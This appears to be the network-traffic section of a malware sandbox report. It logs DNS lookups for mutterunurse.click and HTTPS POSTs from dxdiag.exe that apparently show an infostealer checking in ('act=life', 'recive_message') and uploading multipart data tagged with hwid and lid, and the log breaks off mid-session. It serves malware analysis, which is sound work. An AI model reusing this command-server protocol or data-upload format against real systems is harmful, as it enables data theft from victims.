                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Jan 13, 2025 08:34:20.688806057 CET1.1.1.1192.168.2.50x355bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 08:34:20.688806057 CET1.1.1.1192.168.2.50x355bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 08:34:24.442120075 CET1.1.1.1192.168.2.50x2848No error (0)mutterunurse.click104.21.90.18A (IP address)IN (0x0001)false
                                                                                        Jan 13, 2025 08:34:24.442120075 CET1.1.1.1192.168.2.50x2848No error (0)mutterunurse.click172.67.151.5A (IP address)IN (0x0001)false
                                                                                        • mutterunurse.click
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549720104.21.90.184435392C:\Windows\SysWOW64\dxdiag.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 07:34:25 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: mutterunurse.click
                                                                                        2025-01-13 07:34:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2025-01-13 07:34:25 UTC1125INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 07:34:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=qt7l0t46908etvpsk7llc72r9n; expires=Fri, 09 May 2025 01:21:04 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktAWFyymOeahvAVL5lJskQB6Xo%2Bukf2wJhQSlpDAndnrQKi5scOmzOIRs9W8nDUqJH8KOTfRPsI1uaeA2d9b7TCXzJul5AxEU1oK10OFaWw7y29jhv0WRIgcsb6J2ZfkazOdp%2Bw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9013b4270aeb238a-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1862&min_rtt=1839&rtt_var=706&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1587819&cwnd=173&unsent_bytes=0&cid=0f07bbf910d1dd8a&ts=549&x=0"
                                                                                        2025-01-13 07:34:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2025-01-13 07:34:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549722104.21.90.184435392C:\Windows\SysWOW64\dxdiag.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 07:34:26 UTC266OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 45
                                                                                        Host: mutterunurse.click
                                                                                        2025-01-13 07:34:26 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 78 4d 6e 4c 71 37 2d 2d 52 4c 43 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=xMnLq7--RLC&j=
                                                                                        2025-01-13 07:34:26 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 07:34:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=9cjq0vntkd808jn3ubf1gqdmm6; expires=Fri, 09 May 2025 01:21:05 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgudxp7%2BlLngWNKyMm6H6BGy31Z3IcLdZ2fvKnDizopS0ODbVnaGLT9MmPExZyCd2KYkYYf7OREn64EvZoDuvQoPu%2FO3AdQw58V8pmFFFOzPCsv6IMZ4zqV2U%2FW8SFHYZeWWflI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9013b42e3e1c0f9d-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1489&rtt_var=563&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=947&delivery_rate=1937624&cwnd=193&unsent_bytes=0&cid=d12e0ebf907e94d6&ts=504&x=0"
                                                                                        2025-01-13 07:34:26 UTC242INData Raw: 63 34 34 0d 0a 68 63 2b 50 38 62 41 66 62 59 41 59 49 6e 62 36 4c 57 33 62 6a 72 61 41 4e 34 56 59 6e 37 53 39 4a 62 2f 4b 32 42 4e 74 54 31 48 2b 37 66 6e 54 69 69 74 42 6f 6d 74 48 56 4d 42 5a 48 36 37 72 6d 71 4a 57 34 58 71 6c 30 74 78 4a 7a 4b 2f 30 4d 52 73 69 63 37 2b 70 37 70 33 44 65 6b 47 69 66 56 70 55 77 48 59 57 2b 65 76 59 6f 67 32 6e 50 66 58 57 33 45 6e 64 71 37 4e 38 48 53 4d 79 37 61 50 6f 6d 64 56 38 43 65 46 30 54 78 4f 66 53 41 79 78 34 4e 2f 74 58 2b 68 36 73 35 62 59 58 35 33 77 2b 6c 34 49 4f 7a 44 49 72 76 79 61 6b 6d 4a 42 2b 7a 70 48 47 4e 67 58 54 37 72 72 31 4f 78 52 34 54 50 33 33 4e 56 42 33 4b 36 79 59 77 51 70 4f 65 32 74 36 35 6a 66 64 52 33 73 66 6b 67 59 6d 55 49 4d 2b 61 4b 55 35
                                                                                        Data Ascii: c44hc+P8bAfbYAYInb6LW3bjraAN4VYn7S9Jb/K2BNtT1H+7fnTiitBomtHVMBZH67rmqJW4Xql0txJzK/0MRsic7+p7p3DekGifVpUwHYW+evYog2nPfXW3Endq7N8HSMy7aPomdV8CeF0TxOfSAyx4N/tX+h6s5bYX53w+l4IOzDIrvyakmJB+zpHGNgXT7rr1OxR4TP33NVB3K6yYwQpOe2t65jfdR3sfkgYmUIM+aKU5
                                                                                        2025-01-13 07:34:26 UTC1369INData Raw: 55 32 6e 59 72 32 46 37 55 54 4d 75 61 39 38 48 79 74 7a 2b 4f 50 30 30 39 56 78 54 37 6f 36 53 42 69 57 53 67 79 32 36 39 58 69 52 2b 67 36 2f 74 37 58 51 39 65 6e 74 58 34 42 4a 7a 54 76 70 4f 71 63 31 58 55 4a 37 58 6b 41 57 74 68 49 46 2f 6d 30 6c 4d 4a 46 35 44 6e 70 32 38 34 48 77 75 61 6a 4d 51 67 68 63 37 2f 74 36 35 33 54 63 41 2f 77 63 6b 73 66 6e 56 30 45 73 4f 48 5a 34 6c 6a 74 4e 66 37 57 32 45 33 58 70 37 42 31 41 69 41 31 35 36 32 74 33 5a 4a 36 46 36 49 69 41 44 65 64 58 77 69 31 2b 70 62 59 46 66 68 30 35 4a 62 59 53 35 33 77 2b 6e 6b 4b 4c 6a 44 73 6f 75 36 62 32 57 38 50 38 48 78 4e 45 59 70 4a 43 72 66 6d 31 2f 42 66 36 54 7a 2b 33 39 52 4f 32 4b 2b 2b 4d 55 46 74 4e 50 2f 74 74 64 50 7a 63 41 54 75 63 46 63 55 32 46 42 42 6f 4b 7a 54
                                                                                        Data Ascii: U2nYr2F7UTMua98Hytz+OP009VxT7o6SBiWSgy269XiR+g6/t7XQ9entX4BJzTvpOqc1XUJ7XkAWthIF/m0lMJF5Dnp284HwuajMQghc7/t653TcA/wcksfnV0EsOHZ4ljtNf7W2E3Xp7B1AiA1562t3ZJ6F6IiADedXwi1+pbYFfh05JbYS53w+nkKLjDsou6b2W8P8HxNEYpJCrfm1/Bf6Tz+39RO2K++MUFtNP/ttdPzcATucFcU2FBBoKzT
                                                                                        2025-01-13 07:34:26 UTC1369INData Raw: 7a 79 32 39 4d 48 6b 2b 69 39 61 55 39 31 63 38 32 75 2b 5a 44 59 50 7a 72 68 64 45 34 54 6a 67 38 51 39 2f 57 55 35 56 6d 6e 59 72 33 62 33 6b 2f 62 75 72 56 38 44 43 4d 39 36 4b 6a 69 6d 39 4a 39 41 75 64 2b 53 78 2b 62 51 67 75 72 35 74 54 71 55 4f 59 77 39 35 61 52 42 39 71 77 2b 69 6c 50 48 43 54 73 37 39 69 51 33 48 4d 49 39 44 70 66 57 6f 45 50 43 4c 57 73 6a 4b 4a 59 37 7a 2f 34 32 64 35 4e 30 36 32 77 66 51 63 6a 4d 50 57 69 36 5a 50 65 64 51 58 76 64 45 51 63 6b 55 51 45 76 2b 7a 56 36 42 57 70 65 76 72 4f 6e 78 2b 64 6e 4c 31 39 41 69 4a 78 30 71 37 6a 6e 64 56 72 54 2f 30 30 57 56 53 66 51 30 2f 68 72 4e 6a 72 56 65 77 77 2b 64 62 59 53 74 69 72 76 58 49 43 4b 6a 6e 70 71 75 6d 66 32 33 41 4a 34 6e 31 45 45 59 70 4b 42 72 58 67 6c 4b 77 56 34
                                                                                        Data Ascii: zy29MHk+i9aU91c82u+ZDYPzrhdE4Tjg8Q9/WU5VmnYr3b3k/burV8DCM96Kjim9J9Aud+Sx+bQgur5tTqUOYw95aRB9qw+ilPHCTs79iQ3HMI9DpfWoEPCLWsjKJY7z/42d5N062wfQcjMPWi6ZPedQXvdEQckUQEv+zV6BWpevrOnx+dnL19AiJx0q7jndVrT/00WVSfQ0/hrNjrVeww+dbYStirvXICKjnpqumf23AJ4n1EEYpKBrXglKwV4
                                                                                        2025-01-13 07:34:26 UTC167INData Raw: 47 42 39 71 6b 2b 69 6c 50 4a 44 72 31 6f 2b 4f 61 33 33 73 48 35 58 52 4e 48 35 35 45 43 4c 37 71 32 65 70 59 34 6a 6e 38 30 74 56 56 33 71 4f 77 66 41 56 74 66 61 65 71 39 64 4f 4b 50 53 6a 75 55 31 41 50 69 6c 6c 50 70 71 4c 4e 6f 6c 4c 72 65 71 57 57 33 45 6a 55 70 37 4a 35 41 43 49 33 36 61 76 72 6e 74 64 79 42 66 42 79 54 68 6d 54 51 41 53 72 37 4e 6e 6d 57 65 4d 79 39 74 79 66 43 5a 32 76 6f 6a 46 58 62 51 62 71 6f 75 32 51 78 44 30 51 72 47 4d 41 45 35 51 50 56 2f 6e 67 32 75 4a 61 0d 0a
                                                                                        Data Ascii: GB9qk+ilPJDr1o+Oa33sH5XRNH55ECL7q2epY4jn80tVV3qOwfAVtfaeq9dOKPSjuU1APillPpqLNolLreqWW3EjUp7J5ACI36avrntdyBfByThmTQASr7NnmWeMy9tyfCZ2vojFXbQbqou2QxD0QrGMAE5QPV/ng2uJa
                                                                                        2025-01-13 07:34:26 UTC1369INData Raw: 33 64 35 30 0d 0a 36 7a 62 32 33 74 35 4c 30 36 2b 2f 65 41 63 6c 49 65 61 70 35 5a 4c 63 63 67 37 6d 66 30 55 51 6e 30 73 4a 74 71 79 61 6f 6c 4c 2f 65 71 57 57 38 47 44 6f 36 70 74 4c 54 7a 4a 39 2f 75 33 71 6e 35 49 6c 54 2b 35 35 54 42 79 58 53 51 61 31 35 74 33 70 57 65 77 2b 38 64 2f 61 51 64 79 74 76 33 41 4c 49 54 6e 68 72 75 36 63 33 58 49 48 6f 6a 51 41 45 34 41 50 56 2f 6e 4a 77 2b 6c 62 34 58 72 69 6d 4d 59 48 32 71 54 36 4b 55 38 68 4f 75 47 72 36 4a 2f 54 65 77 66 6e 63 6b 51 56 6e 6b 6b 4d 74 75 6a 52 34 31 72 6a 4e 76 50 63 33 6b 62 52 6f 37 56 36 43 6d 31 39 70 36 72 31 30 34 6f 39 50 75 46 73 56 77 53 55 44 78 44 33 39 5a 54 6c 57 61 64 69 76 64 66 4e 54 64 65 6d 76 33 34 4b 4c 6a 7a 67 6f 4f 75 66 32 48 51 48 35 48 56 4a 42 70 74 44 41
                                                                                        Data Ascii: 3d506zb23t5L06+/eAclIeap5ZLccg7mf0UQn0sJtqyaolL/eqWW8GDo6ptLTzJ9/u3qn5IlT+55TByXSQa15t3pWew+8d/aQdytv3ALITnhru6c3XIHojQAE4APV/nJw+lb4XrimMYH2qT6KU8hOuGr6J/TewfnckQVnkkMtujR41rjNvPc3kbRo7V6Cm19p6r104o9PuFsVwSUDxD39ZTlWadivdfNTdemv34KLjzgoOuf2HQH5HVJBptDA
                                                                                        2025-01-13 07:34:26 UTC1369INData Raw: 76 56 66 55 31 2b 74 48 57 54 4d 2b 69 76 58 59 45 4a 54 6a 6f 71 2f 2b 66 33 47 38 4b 38 47 67 41 57 74 68 49 46 2f 6d 30 6c 4e 52 53 39 79 72 2b 6c 4f 35 52 33 72 36 78 66 41 4e 74 4c 4b 6d 30 72 5a 54 65 50 56 65 69 66 45 38 64 6d 30 41 4f 73 4f 44 5a 35 31 7a 69 4f 2f 76 53 31 55 33 64 72 72 78 77 43 69 63 77 35 71 66 6b 6c 4e 70 36 44 50 41 36 44 6c 53 66 56 30 2f 68 72 50 33 6c 52 2b 6b 71 76 63 6d 52 58 70 32 76 74 6a 46 58 62 54 66 74 6f 75 6d 55 33 6e 73 4b 35 48 64 42 47 35 6c 50 41 4c 33 6e 33 65 52 55 36 6a 2f 77 30 73 31 4e 31 71 65 32 65 41 4d 67 63 36 6e 74 36 6f 75 53 4a 55 2f 54 64 30 34 61 6e 31 6c 50 70 71 4c 4e 6f 6c 4c 72 65 71 57 57 33 6b 76 53 71 37 56 79 44 43 77 35 39 62 2f 68 6d 74 70 34 41 2b 6c 30 52 67 61 65 51 41 61 36 37 39
                                                                                        Data Ascii: vVfU1+tHWTM+ivXYEJTjoq/+f3G8K8GgAWthIF/m0lNRS9yr+lO5R3r6xfANtLKm0rZTePVeifE8dm0AOsODZ51ziO/vS1U3drrxwCicw5qfklNp6DPA6DlSfV0/hrP3lR+kqvcmRXp2vtjFXbTftoumU3nsK5HdBG5lPAL3n3eRU6j/w0s1N1qe2eAMgc6nt6ouSJU/Td04an1lPpqLNolLreqWW3kvSq7VyDCw59b/hmtp4A+l0RgaeQAa679
                                                                                        2025-01-13 07:34:26 UTC1369INData Raw: 64 4c 33 48 32 46 61 64 38 4b 78 68 47 43 6f 73 71 62 53 74 6c 4e 34 39 56 36 4a 38 53 52 4b 66 53 51 47 72 36 64 4c 74 57 75 34 7a 2b 64 37 63 52 39 6d 73 76 58 51 4d 49 54 6a 67 72 75 4b 58 32 33 4d 47 37 54 6f 4f 56 4a 39 58 54 2b 47 73 39 66 6c 57 36 7a 65 39 79 5a 46 65 6e 61 2b 32 4d 56 64 74 50 2b 6d 6f 37 5a 6e 55 65 51 72 6b 63 45 55 55 6b 30 77 41 76 65 72 51 37 56 58 73 4d 2f 7a 51 32 6b 33 57 72 72 64 79 43 53 74 7a 71 65 33 71 69 35 49 6c 54 38 4a 68 54 52 69 66 44 78 44 33 39 5a 54 6c 57 61 64 69 76 64 33 54 51 39 71 6f 74 33 49 48 4b 44 66 74 71 4f 32 62 77 48 55 50 35 57 68 53 46 4a 46 4b 41 37 72 73 30 4f 52 63 34 54 6e 35 6c 70 45 48 32 72 44 36 4b 55 38 41 50 2b 43 45 36 6f 69 53 59 6b 48 37 4f 6b 63 59 32 42 64 50 75 4f 66 65 37 56 6a
                                                                                        Data Ascii: dL3H2Fad8KxhGCosqbStlN49V6J8SRKfSQGr6dLtWu4z+d7cR9msvXQMITjgruKX23MG7ToOVJ9XT+Gs9flW6ze9yZFena+2MVdtP+mo7ZnUeQrkcEUUk0wAverQ7VXsM/zQ2k3WrrdyCStzqe3qi5IlT8JhTRifDxD39ZTlWadivd3TQ9qot3IHKDftqO2bwHUP5WhSFJFKA7rs0ORc4Tn5lpEH2rD6KU8AP+CE6oiSYkH7OkcY2BdPuOfe7Vj
                                                                                        2025-01-13 07:34:26 UTC1369INData Raw: 74 34 48 68 5a 47 6a 4d 52 6c 74 61 37 58 6a 72 59 47 53 4a 55 2b 6c 65 56 49 47 6e 6b 77 5a 75 71 76 71 33 48 4c 78 4d 50 72 47 32 46 44 53 36 50 51 78 41 47 31 72 33 75 33 6b 6c 4d 6c 73 47 65 39 71 52 31 53 6e 41 55 2b 68 72 49 79 69 59 4f 51 30 38 39 48 4a 56 70 43 50 72 48 73 49 50 54 54 77 6f 71 33 64 6b 6e 74 50 75 69 6b 4f 56 4a 78 65 54 2b 47 38 68 72 6b 41 74 47 32 74 68 4d 41 4a 78 4f 69 73 4d 56 64 2f 66 61 65 2f 72 63 75 53 4f 67 7a 77 61 45 59 58 6a 6b 78 49 68 39 4c 7a 2b 46 6a 68 4c 65 7a 6f 34 55 44 48 70 62 78 6d 48 6d 45 6d 35 4b 50 6a 6c 4d 51 39 51 61 4a 31 41 45 79 68 44 30 66 35 30 35 71 69 54 61 64 69 76 65 50 63 53 64 4f 76 72 47 42 43 43 69 6e 71 71 2f 71 43 6b 6a 4e 50 35 44 6f 59 52 74 59 50 43 36 69 73 6a 4c 49 48 76 47 2b 75
                                                                                        Data Ascii: t4HhZGjMRlta7XjrYGSJU+leVIGnkwZuqvq3HLxMPrG2FDS6PQxAG1r3u3klMlsGe9qR1SnAU+hrIyiYOQ089HJVpCPrHsIPTTwoq3dkntPuikOVJxeT+G8hrkAtG2thMAJxOisMVd/fae/rcuSOgzwaEYXjkxIh9Lz+FjhLezo4UDHpbxmHmEm5KPjlMQ9QaJ1AEyhD0f505qiTadivePcSdOvrGBCCinqq/qCkjNP5DoYRtYPC6isjLIHvG+u
                                                                                        2025-01-13 07:34:26 UTC1369INData Raw: 4c 6f 34 6b 68 50 5a 58 50 59 34 36 32 4c 6b 69 56 50 31 33 6c 4f 47 70 39 5a 48 76 54 45 39 39 68 76 70 52 62 36 77 35 31 7a 32 72 69 72 65 67 49 68 63 36 6e 74 36 39 4f 4b 4c 55 47 69 66 6c 46 55 77 42 39 64 34 72 6d 48 74 51 57 31 4a 62 50 50 6e 31 47 64 38 4f 67 2f 54 7a 39 7a 76 2b 32 71 6b 4d 42 76 43 65 46 73 51 31 4f 6d 63 53 69 33 36 39 58 30 52 66 41 31 77 2b 6a 4b 52 4e 4f 6d 76 57 63 65 62 58 32 6e 6f 71 33 4c 36 7a 31 48 6f 6b 55 4f 56 49 41 50 56 2f 6e 5a 31 2b 78 62 34 43 7a 73 6d 2f 68 4a 32 71 6d 73 59 52 67 69 63 36 6e 74 36 39 4f 4b 4c 30 47 69 66 6c 46 55 77 42 39 64 34 72 6d 48 74 51 57 31 4a 62 50 50 6e 31 47 64 38 4f 67 2f 54 7a 39 7a 76 2b 32 71 6b 4d 42 76 43 65 46 73 51 31 4f 6d 63 53 69 33 36 39 58 30 52 66 41 31 73 76 6a 70 5a
                                                                                        Data Ascii: Lo4khPZXPY462LkiVP13lOGp9ZHvTE99hvpRb6w51z2riregIhc6nt69OKLUGiflFUwB9d4rmHtQW1JbPPn1Gd8Og/Tz9zv+2qkMBvCeFsQ1OmcSi369X0RfA1w+jKRNOmvWcebX2noq3L6z1HokUOVIAPV/nZ1+xb4Czsm/hJ2qmsYRgic6nt69OKL0GiflFUwB9d4rmHtQW1JbPPn1Gd8Og/Tz9zv+2qkMBvCeFsQ1OmcSi369X0RfA1svjpZ


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549723104.21.90.184435392C:\Windows\SysWOW64\dxdiag.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 07:34:27 UTC279OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=BDLB8W6B9SBZA
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12803
                                                                                        Host: mutterunurse.click
                                                                                        2025-01-13 07:34:27 UTC12803OUTData Raw: 2d 2d 42 44 4c 42 38 57 36 42 39 53 42 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 32 35 46 45 31 38 44 31 37 41 36 38 41 33 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 42 44 4c 42 38 57 36 42 39 53 42 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 44 4c 42 38 57 36 42 39 53 42 5a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 4d 6e 4c 71 37 2d 2d 52 4c 43 0d 0a 2d 2d 42 44 4c 42 38 57 36 42 39 53 42 5a 41
                                                                                        Data Ascii: --BDLB8W6B9SBZAContent-Disposition: form-data; name="hwid"AD25FE18D17A68A323D904AF30EFEBBC--BDLB8W6B9SBZAContent-Disposition: form-data; name="pid"2--BDLB8W6B9SBZAContent-Disposition: form-data; name="lid"xMnLq7--RLC--BDLB8W6B9SBZA
                                                                                        2025-01-13 07:34:28 UTC1138INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 07:34:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=pq3ug9aqmeclpo89ftk010u4se; expires=Fri, 09 May 2025 01:21:06 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LYhMdTcWx5a9cNKe65w6OARlgKoA7ULEGNJ19G6uO5uhjQZU20r%2BBC5NXvTZMiwaeRVv0lKFMN%2BAuIgf5QIc%2BskGnd1iuv7D17anlDmQNZ%2F3qwOncYYK5aINU%2BAR4%2Bez98HeD%2FY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9013b435eca7440c-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2185&min_rtt=2174&rtt_var=838&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13740&delivery_rate=1288045&cwnd=252&unsent_bytes=0&cid=2494d1279173973e&ts=953&x=0"
                                                                                        2025-01-13 07:34:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2025-01-13 07:34:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549725104.21.90.184435392C:\Windows\SysWOW64\dxdiag.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 07:34:29 UTC283OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=2FNUTFDGJXUM0GLQY
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15069
                                                                                        Host: mutterunurse.click
                                                                                        2025-01-13 07:34:29 UTC15069OUTData Raw: 2d 2d 32 46 4e 55 54 46 44 47 4a 58 55 4d 30 47 4c 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 32 35 46 45 31 38 44 31 37 41 36 38 41 33 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 32 46 4e 55 54 46 44 47 4a 58 55 4d 30 47 4c 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 46 4e 55 54 46 44 47 4a 58 55 4d 30 47 4c 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 4d 6e 4c 71 37 2d 2d 52 4c 43 0d 0a 2d 2d 32
                                                                                        Data Ascii: --2FNUTFDGJXUM0GLQYContent-Disposition: form-data; name="hwid"AD25FE18D17A68A323D904AF30EFEBBC--2FNUTFDGJXUM0GLQYContent-Disposition: form-data; name="pid"2--2FNUTFDGJXUM0GLQYContent-Disposition: form-data; name="lid"xMnLq7--RLC--2
                                                                                        2025-01-13 07:34:29 UTC1135INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 07:34:29 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=52j41hd08kh26imubv2e4lo92k; expires=Fri, 09 May 2025 01:21:08 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E64c0hsHxuY2q7YxQ7k7Oexzew7G3%2Bfbbv4YOv2ertCUPw3XUyd6%2BWVXpdspUvP%2Bm46of27e6yuZpN220A3cf2Y7pS1RvS%2FK0wWZNQcKCtDOeY4M7dJOclTB8NvdEJS%2FkOtzsrE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9013b44218ab424b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2472&min_rtt=2466&rtt_var=937&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16010&delivery_rate=1160111&cwnd=249&unsent_bytes=0&cid=2ed4f2e3b858ff9c&ts=514&x=0"
                                                                                        2025-01-13 07:34:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2025-01-13 07:34:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.549731104.21.90.184435392C:\Windows\SysWOW64\dxdiag.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 07:34:30 UTC281OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=9XHRDZBQH6NW90G
